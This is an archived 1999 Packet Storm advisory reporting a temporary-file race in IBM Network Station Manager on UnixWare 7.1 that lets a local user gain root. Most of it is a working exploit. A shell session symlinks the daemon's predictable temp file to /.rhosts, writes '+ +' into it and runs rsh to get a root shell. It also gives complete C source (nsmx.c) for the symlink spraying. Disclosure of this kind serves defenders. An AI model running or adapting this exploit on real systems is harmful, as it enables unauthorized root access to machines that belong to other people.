unixware.netstation.txt

1999-12-28T00:00:00
ID PACKETSTORM:11045
Type packetstorm
Reporter Brock Tellier
Modified 1999-12-28T00:00:00

Description

                                        
                                            `Greetings,  
  
OVERVIEW  
A vulnerability in IBM's Network Station Manager will allow any local  
user to gain root privileges.  
  
BACKGROUND  
Though I only tested NetStation on UnixWare 7.1, I would imagine that  
this vulnerability is present on most NetStation implementations. This  
daemon  
is installed/running as root by default.  
  
DETAILS  
  
>From the help html:  
  
The IBM Network Station Manager is a browser-based tool  
for centrally administering IBM Network Stations and their  
users. Using the IBM Network Station Manager, the  
administrator can set IBM Network Station settings on a  
server wide basis or an individual user or workstation basis.  
Settings are specifications defining hardware (keyboards,  
mouse speeds and so on) and software as it applies to your  
session.  
  
More or less, it's an http gui for managing your desktop configuration.  
  
A vulnerability exists in the way NetStation creates temporary files.  
Instead of using the secure-ish mktemp, NetStation merely appends the  
current time in seconds to a known file name. Normally, tmp races  
aren't a big deal for http daemons since they run as nobody or similar, but  
NetStation must run as root to be able to open/modify files as a specific  
user. Thus, we can brute force a symlink from xnec.nsu.<time>  
to /.rhosts and gain root.  
  
EXPLOIT  
  
bash-2.02$ ls /usr/netstation/nsm/users/xnec  
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file  
or directory  
  
<now we go to http://localhost:880, login and click on>  
<Hardware -> Workstation>  
  
bash-2.02$ ls /usr/netstation/nsm/users/xnec  
xnec.nsu xnec.usr  
bash-2.02$ cc -o nsmx nsmx.c  
bash-2.02$ ./nsmx  
  
<click on Workstation again>  
  
bash-2.02$ ls -la /.rhosts  
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts  
bash-2.02$ echo "+ +" > /.rhosts  
bash-2.02$ chown root /.rhosts  
bash-2.02$ rsh -l root localhost sh -i  
# id  
uid=0(root) gid=3(sys)  
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)  
,10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)  
#  
  
  
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit  
*  
* Exploits a temporary file race condition in NetStation's HTTP interface  
*  
* To exploit: first, change the paths below to reflect your individual  
* settings/paths. Don't worry if <username>.nsu doesn't exist, NS will  
* create it for you. Next, point your browser at  
* http://localhost:880 and login as a normal user. Click on "Hardware"  
* Then "workstation". This will create <netstationdir>/users/xnec.  
* Next, compile and run this program. You only have thirty seconds from  
* the time you complete this step to then click on "Workstation". When  
* this is done, you should have an /.rhosts which you own. On some  
* UnixWare systems, you may need to chown root /.rhosts in order to do  
* rsh -l root localhost sh -i.  
*  
* Brock Tellier btellier@usa.net  
*  
*/  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/time.h>  
  
void main() {  
  
/* Change these paths */  
  
char dest[20] = "/.rhosts";  
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";  
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";  
long sec;  
int i;  
  
sec = time(0);  
  
for (i = 0; i < 30; i++) {  
sprintf(sourcesym, "%s%d", source, (sec + i));  
symlink(dest,sourcesym);  
}  
  
}  
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
btellier@usa.net  
  
____________________________________________________________________  
Get free email and a permanent address at http://www.netaddress.com/?N=1  
  
  
`